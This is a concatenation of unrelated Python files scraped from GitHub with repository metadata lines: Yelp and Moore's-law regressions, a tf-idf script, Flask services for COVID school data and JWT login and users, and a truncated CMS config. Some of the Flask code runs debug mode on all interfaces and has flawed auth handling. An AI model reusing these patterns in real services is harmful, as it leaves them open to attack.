# In[22]:
print(select_df.columns)
# In[23]:
# columns with non-boolean categorical values:
cols_to_split = ['attributes.AgesAllowed', 'attributes.Alcohol', 'attributes.BYOBCorkage',
'attributes.NoiseLevel', 'attributes.RestaurantsAttire', 'attributes.Smoking', 'attributes.WiFi']
new_cat = pd.concat([pd.get_dummies(select_df[col], prefix=col, prefix_sep='_') for col in cols_to_split], axis=1)
# keep all columns (not n-1) because 0's for all of them indicates that the data was missing (useful info)
select_df = pd.concat([select_df, new_cat], axis=1)
select_df.drop(cols_to_split, inplace=True, axis=1)
select_df.head()
# In[24]:
print(select_df.info())
# In[25]:
#drop columns with non-numeric
select_df = select_df.select_dtypes(exclude=['object'])
print(select_df.columns)
# In[26]:
print(select_df.info())
# In[27]:
y = select_df['stars']
X = select_df.drop(columns = ['stars'])
# In[28]:
sns.distplot(y, kde=False)
# In[29]:
sns.boxplot(x='attributes.WiFi_free', y='stars', data= select_df)
# In[30]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.3, random_state=1)
print(X_train.shape)
print(X_test.shape)
# In[31]:
lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))
ENet = make_pipeline(RobustScaler(), ElasticNet(alpha=0.0005, l1_ratio=.9, random_state=3))
GBoost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,
max_depth=4, max_features='sqrt',
min_samples_leaf=15, min_samples_split=10,
loss='huber', random_state =5)
# In[32]:
lasso.fit(X_train, y_train)
y_pred_train = lasso.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = lasso.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[33]:
ENet.fit(X_train, y_train)
y_pred_train = ENet.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = ENet.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[34]:
GBoost.fit(X_train, y_train)
y_pred_train = GBoost.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = GBoost.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[35]:
#use cross-validation instead of train-test split for a better estimation of the RMSE
kfold = KFold(n_splits=10, shuffle=True, random_state=1)
cross_val_scores = cross_val_score(GBoost, X, y, scoring='neg_mean_squared_error', cv=kfold)
print('10-fold RMSEs:')
print([np.sqrt(-x) for x in cross_val_scores])
print('CV RMSE:')
print(np.sqrt(-np.mean(cross_val_scores))) # RMSE is the sqrt of the avg of MSEs
print('Std of CV RMSE:')
print(np.std(cross_val_scores))
# In[36]:
#parameters tuning for xgboost
def modelfit(alg,useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
if useTrainCV:
xgb_param = alg.get_xgb_params()
xgtrain =xgb.DMatrix(X_train,label=y_train)
xgtest = xgb.DMatrix(X_test)
cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
early_stopping_rounds=early_stopping_rounds,show_stdv=False)
alg.set_params(n_estimators=cvresult.shape[0])#cvresult.shape[0] and alg.get_params()['n_estimators'] are same
#Fit the algorithm on the data
alg.fit(X_train, y_train,eval_metric='rmse')
#Predict training set:
dtrain_predictions = alg.predict(X_train)
#Print model report:
print("Score (Train): %f" % mean_squared_error(y_train.values, dtrain_predictions))
#Predict on testing data:
dtest_predictions = alg.predict(X_test)
print("Score (Test): %f" % mean_squared_error(y_test.values, dtest_predictions))
# In[37]:
xgb1 = XGBRegressor(booster='gbtree',
objective= 'reg:linear',
eval_metric='rmse',
gamma = 0.1,
min_child_weight= 1.1,
max_depth= 5,
subsample= 0.8,
colsample_bytree= 0.8,
tree_method= 'exact',
learning_rate=0.1,
n_estimators=100,
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb1)
# In[57]:
get_ipython().run_cell_magic('time', '', "\n#Grid seach for max_depth and min_child_weight tuning\n\nparam_test1 = {\n 'max_depth':[3,5,7,9],\n 'min_child_weight':[1,3,5]\n}\ngsearch1 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 1.1,\n max_depth= 5,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test1, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch1.fit(X_train,y_train)")
# In[39]:
gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_
# In[58]:
get_ipython().run_cell_magic('time', '', "#try another one\nparam_test1b = {\n 'min_child_weight':[6,8,10,12]\n}\ngsearch1b = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 1.1,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test1b, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch1b.fit(X_train,y_train)")
# In[59]:
gsearch1b.grid_scores_, gsearch1b.best_params_, gsearch1b.best_score_
# In[60]:
get_ipython().run_cell_magic('time', '', "#gamma tuning\nparam_test3 = {\n 'gamma':[i/10.0 for i in range(0,5)]\n}\ngsearch3 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test3, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch3.fit(X_train,y_train)")
# In[61]:
gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_
# In[62]:
get_ipython().run_cell_magic('time', '', "#subsample and colsample_bytree tuning\nparam_test4 = {\n 'subsample':[i/10.0 for i in range(6,10)],\n 'colsample_bytree':[i/10.0 for i in range(6,10)]\n}\ngsearch4 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test4, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch4.fit(X_train,y_train)")
# In[63]:
gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_
# In[64]:
get_ipython().run_cell_magic('time', '', "#reg_alpha、reg_lambda rough tuning\n\nparam_test6 = {\n 'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]\n}\ngsearch6 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test6, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch6.fit(X_train,y_train)")
# In[65]:
gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_
# In[66]:
get_ipython().run_cell_magic('time', '', "##reg_alpha、reg_lambda fine tuning\nparam_test7 = {\n 'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]\n}\ngsearch7 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test7, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch7.fit(X_train,y_train)")
# In[67]:
gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_
# In[68]:
get_ipython().run_cell_magic('time', '', "#reduce learning_rate, increase n_estimators\nparam_test9 = {\n 'n_estimators':[50, 100, 200, 500,1000],\n 'learning_rate':[0.001, 0.01, 0.05, 0.1,0.2]\n}\ngsearch9 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n reg_alpha=0.01, \n seed=27),\n param_grid = param_test9, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch9.fit(X_train,y_train)\n")
# In[69]:
gsearch9.grid_scores_, gsearch9.best_params_, gsearch9.best_score_
# In[52]:
xgb9 = XGBRegressor(booster='gbtree',
objective= 'reg:linear',
eval_metric='rmse',
gamma = 0.4,
min_child_weight= 10,
max_depth= 7,
subsample= 0.8,
colsample_bytree= 0.6,
tree_method= 'exact',
learning_rate=0.01,
n_estimators=500,
nthread=4,
scale_pos_weight=1,
reg_alpha=0.05,
seed=27)
# In[53]:
xgb9.fit(X_train,y_train)
# In[54]:
sqrt(mean_squared_error(xgb9.predict(X_test),y_test))
# In[55]:
fig, ax = plt.subplots(1, 1, figsize=(8, 13))
xgb.plot_importance(xgb9, max_num_features=20, height=0.5, ax=ax)
| shayan113/Yelp-Data-Exploration | Yelp Dataset Exploration2.py | Yelp Dataset Exploration2.py | py | 17,612 | python | en | code | 0 | github-code | 50 |
74571782556 | from flask import Flask, request
import re
import os
import sys
import time
import json
import requests
debug = True
covid_cache = {}
def fetch_status(id):
global covid_cache
try:
if id in covid_cache.keys():
if time.time()-covid_cache[id]['timestamp'] < 3600:
if debug: print("cached data")
return True
else:
if debug: print("updating scached data")
# DATAGENERACIO;DATACREACIO;CODCENTRE;CODIMUNICIPI;ESTAT;GRUP_CONFIN;ALUMN_CONFIN;DOCENT_CONFIN;ALTRES_CONFIN;GRUP_ESTABLE;ALUMN_POSITIU;PERSONAL_POSITIU;ALTRES_POSITIU
# 01/10/2020 7:00;28/09/2020 9:28;IDCENTRE;MUNICIPI;Obert;0;6;0;0;51;0;0;0
# DATAGENERACIO;DATACREACIO;CODCENTRE;ESTAT;GRUP_CONFIN;ALUMN_CONFIN;DOCENT_CONFIN;ALTRES_CONFIN;GRUP_ESTABLE;ALUMN_POSITIU;PERSONAL_POSITIU;ALTRES_POSITIU
# 03/10/2020 7:00;02/10/2020 8:51;IDCENTRE;Obert;0;5;0;0;51;0;0;0
regex_str = '[0-9]+/[0-9]+/[0-9]+ [0-9]+:[0-9]+;([0-9]+)/([0-9]+)/[^;]+;'+id+';([^;]+);([0-9]+);([0-9]+);([0-9]+);([0-9]+);[0-9]+;([0-9]+);([0-9]+);([0-9]+)'
if debug: print(regex_str)
r = requests.get('https://tracacovid.akamaized.net/data.csv', stream=True)
for line in r.iter_lines(decode_unicode=True):
if debug: print(line)
m = re.search(regex_str, line)
if m:
ultim_update = (int(m.group(1))*100)+int(m.group(2))
estat_centre = m.group(3)
groups_confinats = int(m.group(4))
confinats = int(m.group(5))+int(m.group(6))+int(m.group(7))
positius = int(m.group(8))+int(m.group(9))+int(m.group(10))
covid_cache[id] = {
'timestamp': time.time(),
'ultim_update': ultim_update,
'estat_centre': estat_centre,
'groups_confinats': groups_confinats,
'confinats': confinats,
'positius': positius
}
return True
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
print(str(e))
return False
app = Flask(__name__)
@app.route('/school/<id>')
def query_example(id):
global covid_cache
fetch_status(id)
try:
if covid_cache[id]:
return json.dumps(covid_cache[id])
else:
return { 'WTF': True }
except:
pass
return { 'WTF': True }
app.run(host='0.0.0.0', debug=debug, port=5000) | jordiprats/python-covidcache | covidcache.py | covidcache.py | py | 2,818 | python | en | code | 0 | github-code | 50 |
25604701736 | import csv
from typing import Dict
from pathlib import Path
import xml.etree.ElementTree as ET
def get_namespace(root: ET.Element) -> Dict[str, str]:
return {"page": root.tag.split('}')[0].strip('{')}
def export_stats(stats: dict, output_dir: Path):
csv_header = ["Project", "Lines of ground truth"]
try:
with Path(output_dir, "stats.csv").open("w") as statsfile:
writer = csv.DictWriter(statsfile, fieldnames=csv_header)
writer.writeheader()
for dir in stats:
writer.writerow({'Project': dir, 'Lines of ground truth': stats[dir]})
except IOError as e:
raise e
def cprint(fmt, fg=None, bg=None, style=None):
"""
Colour-printer.
cprint( 'Hello!' ) # normal
cprint( 'Hello!', fg='g' ) # green
cprint( 'Hello!', fg='r', bg='w', style='bx' ) # bold red blinking on white
List of colours (for fg and bg):
k black
r red
g green
y yellow
b blue
m magenta
c cyan
w white
List of styles:
b bold
i italic
u underline
s strikethrough
x blinking
r reverse
y fast blinking
f faint
h hide
"""
COLCODE = {
'k': 0, # black
'r': 1, # red
'g': 2, # green
'y': 3, # yellow
'b': 4, # blue
'm': 5, # magenta
'c': 6, # cyan
'w': 7 # white
}
FMTCODE = {
'b': 1, # bold
'f': 2, # faint
'i': 3, # italic
'u': 4, # underline
'x': 5, # blinking
'y': 6, # fast blinking
'r': 7, # reverse
'h': 8, # hide
's': 9, # strikethrough
}
# properties
props = []
if isinstance(style, str):
props = [FMTCODE[s] for s in style]
if isinstance(fg, str):
props.append(30 + COLCODE[fg])
if isinstance(bg, str):
props.append(40 + COLCODE[bg])
# display
props = ';'.join([str(x) for x in props])
if props:
print('\x1b[%sm%s\x1b[0m' % (props, fmt))
else:
print(fmt)
| maxnth/GTCounter | src/utils.py | utils.py | py | 2,222 | python | en | code | 1 | github-code | 50 |
601544481 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import re
# Load the data
df = pd.read_csv("moore.csv", header = None, sep='\t')
#df.info()
# <class 'pandas.core.frame.DataFrame'>
# RangeIndex: 102 entries, 0 to 101
# Data columns (total 6 columns):
# 0 102 non-null object
# 1 102 non-null object
# 2 102 non-null object
# 3 102 non-null object
# 4 97 non-null object
# 5 95 non-null object
# dtypes: object(6)
# memory usage: 4.9+ KB
#print(df.dtypes)
# 0 object
# 1 object
# 2 object
# 3 object
# 4 object
# 5 object
# dtype: object
#print(type(df[0]))
# <class 'pandas.core.series.Series'>
#print(type(df))
# <class 'pandas.core.frame.DataFrame'>
#print(df[[1, 2]]) # This returns columns with index 1 & 2
#print(df.columns)
# Int64Index([0, 1, 2, 3, 4, 5], dtype='int64') # This gives us the datatype of the column index (not the contents which are above shown as object)
#print(df.columns.values)
# [0 1 2 3 4 5]
#print (type(df.iloc[0, 2])) # Even though df.types returns object, the individual element of row 0, column 2 is a 'str'. This
# <class 'str'> command is essential for determining the data type of individual elements.
#print (type(df.iloc[0, 1])) # Even though df.types returns object, the individual element of row 0, column 1 is a 'str'. This
# <class 'str'> command is essential for determining the data type of individual elements.
df[2] = df[2].replace('\[.*\]', '', regex = True).astype(np.int64) # \[.*\] is for removing references in square brackets
# .astype(np.int64) is for converting from 'str' to 'int64'
df[1] = df[1].str.lstrip('~cca').str.rstrip('') # strips ~ & cca characters from data
df[1] = df[1].replace('\,', '', regex = True) # strips , from data
df[1] = df[1].replace('\[.*\]', '', regex = True).astype(np.int64)
#print (type(df.iloc[0, 2])) # The individual element of row 0, column 2 is now a 'numpy.int64'
# <class 'numpy.int64'>
#print (type(df.iloc[0, 1])) # The individual element of row 0, column 1 is now a 'numpy.int64'
# <class 'numpy.int64'>
# Split the data into data & target. We ignore column 0, 3, 4 & 5. Column 1 (no of transistors) is our target & column 2 (the year) is our data!
data = df[2].values
target = df[1].values
# To convert into log
target = np.log(target)
# This is to calculate the common denominator from variables 'a' & 'b' as solved in my notes!
d1 = np.dot(data, data) / len(data)
d2 = np.power(np.mean(data), 2)
denominator = d1 - d2
# Now calculating numerator for variable 'a' as solved in my notes!
num_a = (np.dot(data, target) / len(data)) - (np.mean(data) * np.mean(target))
# Now calculating numerator for variable 'b' as solved in my notes!
num_b = (np.mean(target) * np.dot(data, data) / len(data)) - np.mean(data) * (np.dot(data, target) / len(data))
# Now calculating variables 'a' & 'b' as solved in my notes!
a = num_a / denominator
b = num_b / denominator
# Now calculating the equation of line with minimum error!
Ypred = a*data + b
# Plotting the data on x-axis & target on y-axis
plt.scatter(data, target, marker = 'o', c = 'Black')
plt.title("Linear Regression")
plt.xlabel("Data")
plt.ylabel("Target")
# Plotting the line of best fit with minimum error
plt.plot(data, Ypred, 'red')
plt.show()
# Calculating R2. First calculating SSE & SST
SSE = np.sum(np.power(target - Ypred, 2))
SST = np.sum(np.power(target - np.mean(target), 2))
R2 = 1 - (SSE/SST)
print("The value of R-squared is:", R2)
# how long does it take to double?
# log(transistorcount) = a*year + b
# transistorcount = exp(b) * exp(a*year)
# 2*transistorcount = 2 * exp(b) * exp(a*year) = exp(ln(2)) * exp(b) * exp(a * year) = exp(b) * exp(a * year + ln(2))
# a*year2 = a*year1 + ln2
# year2 = year1 + ln2/a
print("time to double:", np.log(2)/a, "years")
# Below is my solution for the above
# ln(Ypred) = a*data + b = a*year + b
# Ypred = exp(a*year + b) --> (I)
# 2Ypred = exp(a*yearWhenDoubled + b) --> (II)
# Now putting (I) into (II)
# 2 * exp(a*year + b) = exp(a*yearWhenDoubled + b)
# exp(ln(2) + a*year + b) = exp(a*yearWhenDoubled + b)
# Now if we take ln on both sides, the power comes down to the left & ln(exp) = 1
# ln(2) + a*year + b = a*yearWhenDoubled + b
# ln(2) = a*yearWhenDoubled - a*year
# ln(2) / a = yearWhenDoubled - year | YasirHabib/linear-regression-in-python | Section2/moore_law.py | moore_law.py | py | 4,421 | python | en | code | 0 | github-code | 50 |
30072993488 | # from symbol import term
import matplotlib.pyplot as plt
import numpy as np
import sys
import operator
import argparse
import copy
from nltk.corpus import stopwords
import gensim
from gensim import corpora, models
# from textblob import TextBlob
from bs4 import BeautifulSoup
import pickle
def main():
word_freq("..\mail_bodies_small.txt")
def word_freq(filename):
doc = {}
tf_idf = {}
doc_words = [[]]
termdf = {}
msg_doc = {}
no_of_docs = 0
doc_length = 0
msg_line_count = 0
for line in open(filename, encoding="utf-8"):
line = line.strip()
if(line == "*****************************************************"):
# if(msg_line_count<3):
# msg_doc.clear()
# msg_line_count = 0
# continue
doc_words.append([])
msg_line_count = 0
no_of_docs += 1
for term in msg_doc:
if (doc.__contains__(term)):
doc[term] = int(doc.get(term)) + msg_doc[term]
else:
doc[term] = 1
for term in msg_doc:
msg_doc[term] = msg_doc[term]/doc_length
#print(msg_doc)
tf_idf[no_of_docs-1] = copy.deepcopy(msg_doc)
msg_doc.clear()
doc_length = 0
else:
# if(line[0] != '>'):
msg_line_count+=1
# line = BeautifulSoup(line).get_text()
split = line.split(' ')
for entry in split:
entry = entry.lower()
if(entry in stopwords.words('english') or (not entry.isalnum()) or len(entry)<=2):
continue
if(entry.isnumeric() == False):
doc_length += 1
doc_words[-1].append(entry)
if (msg_doc.__contains__(entry)):
msg_doc[entry] = int(msg_doc.get(entry)) + 1
else:
msg_doc[entry] = 1
if(termdf.__contains__(entry)):
termdf[entry] = int(termdf.get(entry)) + 1
else:
termdf[entry] = 1
tfidf = {}
#print(tf_idf)
for doct in tf_idf:
for term in tf_idf[doct]:
tf_idf[doct][term] = tf_idf[doct][term] * np.log(no_of_docs/termdf[term])
tf_idf[doct] = {key: val for key, val in sorted(tf_idf[doct].items(), key = lambda ele: ele[1], reverse = True)}
# for doc in tf_idf:
# print(tf_idf[doc])
# for doct in tf_idf:
# for term in tf_idf[doct]:
# if term in termdf:
# tf_idf[doct][term] = tf_idf[doct][term] * no_of_docs/(1+ termdf[term])
for term in doc:
tfidf[term] = doc[term] * np.log(no_of_docs/termdf[term])
sorted_doc = (sorted(tfidf.items(), key=operator.itemgetter(1)))[::-1]
print("num docs", no_of_docs)
# print(sorted_doc)
top = []
topfreq = []
for i in range(min(len(sorted_doc), 40)):
entry = sorted_doc[i]
top.append(entry[0])
topfreq.append(entry[1])
with open("tf_idf_data.json","w",encoding="utf-8") as f:
for doc in sorted_doc:
if not doc[0][0].isnumeric():
print(str(doc[0])+":"+str(doc[1])+',\n', file = f)
with open("tf_idf.json","w",encoding="utf-8") as f:
for doct in tf_idf.keys():
print(doct,file=f)
for term in tf_idf[doct]:
print(str(term)+":"+str(tf_idf[doct][term])+',\n', file = f)
# words = [doc[0] for doc in sorted_doc]
# print(doc_words)
# dictionary = corpora.Dictionary(doc_words)
# corpus = [dictionary.doc2bow(text) for text in doc_words]
# ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics = 20, id2word = dictionary, passes = 20)
# print(ldamodel.print_topics(num_topics = 10, num_words = 10))
# with open("words","w") as f:
# f.write(sorted_doc.keys())
# plt.barh(y, x)
# plt.barh(top, topfreq)
# plt.xlabel("Frequency")
# plt.ylabel("Word")
# plt.show()
if __name__ == "__main__":
main() | joelmathew003/Gmail-Mail-Tagging | py scripts/tf_idf_scripts/tf_idf_attempt2.py | tf_idf_attempt2.py | py | 4,219 | python | en | code | 0 | github-code | 50 |
45620765778 | def steps(number):
if number <= 0:
raise ValueError("Only positive integers are allowed")
cont = 0
while number > 1:
cont += 1
if (number % 2) == 0:
number //= 2
else:
number = (number*3) + 1
return cont
print(steps(16)) | Japarraes/Python_Exercism | Numbers/collatz_conjeture.py | collatz_conjeture.py | py | 317 | python | en | code | 0 | github-code | 50 |
44705708478 | from app.main.model.models import Book, Users
from flask_restful import Resource
from flask import jsonify, request, make_response
import datetime
import jwt
from flask import Blueprint
from functools import wraps
from werkzeug.security import check_password_hash, generate_password_hash
from bson.objectid import ObjectId
from flask_jwt_extended import (
jwt_required,
create_access_token,
create_refresh_token,
get_jwt_identity,
)
auth_api = Blueprint("auth_api", __name__)
arr = []
class PostApiView(Resource):
def get(self):
books = Book.objects.all()
result = [
{"id": str(book.id), "title": book.title, "text": book.text}
for book in books
]
return jsonify(result)
def post(self):
new_one = request.get_json()
Book(title=new_one["title"], text=new_one["text"]).save()
books = Book.objects.all()
result = [
{"id": str(book.id), "title": book.title, "text": book.text}
for book in books
]
return jsonify(result)
def put(self):
new_one = request.get_json()
Book.objects.get(title="cool story").update(**new_one)
# Book(title=new_one["title"], text=new_one["text"]).save()
books = Book.objects.all()
result = [
{"id": str(book.id), "title": book.title, "text": book.text}
for book in books
]
return jsonify(result)
def delete(self):
new_one = request.get_json()
Book.objects.get(title=new_one["title"], text=new_one["text"]).delete()
books = Book.objects.all()
result = [
{"id": str(book.id), "title": book.title, "text": book.text}
for book in books
]
return jsonify(result)
class LoginApi(Resource):
def post(self):
from manage import app
auth = request.get_json()
if auth and check_password_hash(
Users.objects.filter(name=auth["username"]).first().psw, auth["password"]
):
user = Users.objects.filter(name=auth["username"]).first()
token = jwt.encode(
{
"user_id": str(user.id),
"user": auth["username"],
"exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
},
app.config["SECRET_KEY"],
)
refresh = create_refresh_token(identity=str(user.id), expires_delta=datetime.timedelta(minutes=30))
return jsonify(
{
"user": {
"username": user.name,
"access": token.decode("UTF-8"),
"refresh": refresh
}
}
)
return make_response(
"Could not verify",
401,
{"WWW-Authenticate": 'Basic realm="Login required"'},
)
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
from manage import app
token = ""
if "x-access-token" in request.headers:
token = request.headers["x-access-token"]
if not token:
return jsonify({"message": "token is missing"}), 403
try:
data = jwt.decode(token, app.config["SECRET_KEY"])
current_user = Users.objects.filter(id=ObjectId(data["user_id"])).first()
except Exception:
return jsonify({"message": "tocken is invalid"}), 403
return f(current_user, *args, **kwargs)
return decorated
@auth_api.route('/token/refresh', methods=["POST"])
@jwt_required
def refresh_users_token():
identity = get_jwt_identity()
access = create_access_token(identity=identity, expires_delta=datetime.timedelta(minutes=40))
return jsonify({
'access': access
})
@auth_api.route("/unprotected")
def unprotected(current_user):
return jsonify({"massage": "this page anyone can see"})
@auth_api.route("/protected")
@token_required
def protected(current_user):
return jsonify({"massage": "this page can see only users with valid token"})
@auth_api.route("/users/")
@token_required
def get_users(current_user):
users = Users.objects.all()
print(current_user)
response = {
"users": [{"username": user.name, "password": user.psw} for user in users]
}
return jsonify(response)
@auth_api.route("/users/", methods=["POST"])
def create_users():
data = request.get_json()
Users(name=data["name"], psw=generate_password_hash(data["password"])).save()
return jsonify({"message": "user added successfully"})
@auth_api.route("/users/", methods=["PUT"])
@token_required
def change_cur_user(current_user):
data = request.get_json()
current_user.update(**data)
return jsonify({"message": "user changed successfully"})
@auth_api.route("/users/", methods=["DELETE"])
@token_required
def delete_cur_user(current_user):
print(f"current_user - {current_user}")
current_user.delete()
return jsonify({"message": "user deleted successfully"})
| YaroslavYaryk/Programming | Python/FlaskApp/app/main/controller/auth_api.py | auth_api.py | py | 5,135 | python | en | code | 0 | github-code | 50 |
24311435778 | from .models import Order
from .form import OrderForm
def sort_orders(queryset):
new_sorted = {}
i = 0
for item in queryset:
i += 1
urgency_weight = (int(item.urgency) * 0.7)
position_weight = (len(queryset) - (i))*0.3
name = item.name
new_sorted[name] = urgency_weight + position_weight
pointer = 0
unique_id = 0
for item in new_sorted:
if item == queryset[pointer].name:
Order.objects.filter(name=item).update(alias=(str(unique_id) + str(unique_id) + str(queryset[pointer].id)))
Order.objects.filter(name=item).update(score=new_sorted[item])
pointer += 1
else:
pointer += 1
continue
return new_sorted
queryset = Order.objects.all()
sort_orders(queryset) | lukejamestyler/Bungee | src/CommunitySupport/need/sort.py | sort.py | py | 814 | python | en | code | 0 | github-code | 50 |
3195056829 | from flask import jsonify, request
from flask_restful import abort, Resource
from db import DBConn
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
class UserController(Resource):
def get(self, id):
conn = DBConn()
conn.conn.row_factory = dict_factory
cur = conn.conn.cursor()
query = "SELECT * FROM Users WHERE id=?"
cur.execute(query, (id))
data = cur.fetchall()
if len(data) > 0 :
return data[0]
else:
abort(404, message=f"User {id} doesn't exist")
class UsersController(Resource):
def get(self):
conn = DBConn()
conn.conn.row_factory = dict_factory
cur = conn.conn.cursor()
query = "SELECT * FROM Users"
cur.execute(query)
print(cur)
data = cur.fetchall()
conn.Close()
return data
def post(self):
req = request.get_json(force=True)
requried_fields = {'firstName', 'lastName', 'age', 'isBamaFan'}
missing_fields = requried_fields.difference(req)
if len(missing_fields) != 0:
abort(400,message=f"Request body missing values: {missing_fields}")
conn = DBConn()
cur = conn.conn.cursor()
query = "INSERT INTO Users (firstName, lastName, age, isBamaFan) VALUES (?,?,?,?)"
params = (req["firstName"], req["lastName"], req["age"], req["isBamaFan"])
cur.execute(query, params)
data = req
data["id"] = cur.lastrowid
conn.conn.commit()
conn.Close()
return data | bmw2621/workPresentation | backend/python/users.py | users.py | py | 1,650 | python | en | code | 0 | github-code | 50 |
38750788230 | # Configurations dependent on the sample type.
import sys
import FWCore.ParameterSet.Config as cms
import os
if sys.version_info.major < 3:
from sets import Set as set
mcSampleTypes = set([ 'MC_16', 'MC_UL16', 'MC_UL16APV', 'MC_17', 'MC_UL17', 'MC_18', 'MC_UL18', 'Emb_16', 'Emb_17', 'Emb_18ABC', 'Emb_18D', 'MC_Phase2_113X', 'MC_Phase2_111X', 'MC_Phase2_110X', 'MC_RUN3_122X'])
dataSampleTypes = set([ 'Run2016' , 'Run2017', 'Run2018ABC', 'Run2018D', 'RunUL2018' ])
periodDict = { 'MC_16' : 'Run2016',
'MC_UL16': 'Run2016',
'MC_UL16APV': 'Run2016',
'Run2016' : 'Run2016',
'Emb_16' : 'Run2016',
'MC_17' : 'Run2017',
'MC_UL17': 'Run2017',
'Run2017' : 'Run2017',
'Emb_17' : 'Run2017',
'MC_18' : 'Run2018',
'MC_UL18' : 'Run2018',
'Run2018ABC' : 'Run2018',
'Run2018D' : 'Run2018',
'RunUL2018' : 'Run2018',
'Emb_18ABC' : 'Run2018',
'Emb_18D' : 'Run2018',
'MC_Phase2_110X' : 'Phase2',
'MC_Phase2_111X' : 'Phase2',
'MC_Phase2_113X' : 'Phase2',
'MC_RUN3_122X': "Run3"
}
globalTagMap = { 'MC_16' : '102X_mcRun2_asymptotic_v7',
'MC_UL16': '106X_mcRun2_asymptotic_v17',
'MC_UL16APV': '106X_mcRun2_asymptotic_preVFP_v11',
'Run2016' : '102X_dataRun2_v12',
'Emb_16' : '102X_dataRun2_v12',
#'Emb_16' : '80X_dataRun2_2016SeptRepro_v7',
'MC_17' : '102X_mc2017_realistic_v7',
'MC_UL17': '106X_mc2017_realistic_v9',
'Run2017' : '102X_dataRun2_v12',
'Emb_17' : '102X_dataRun2_v12',
'MC_18' : '102X_upgrade2018_realistic_v20',
'MC_UL18' : '106X_upgrade2018_realistic_v16_L1v1',
'Run2018ABC' : '102X_dataRun2_v12',
'Run2018D' : '102X_dataRun2_Prompt_v15',
'RunUL2018' : '106X_dataRun2_v35',
'Emb_18ABC' : '102X_dataRun2_v12',
'Emb_18D' : '102X_dataRun2_Prompt_v15',
'MC_Phase2_110X' : '110X_mcRun4_realistic_v3',
'MC_Phase2_111X' : 'auto:phase2_realistic_T15',
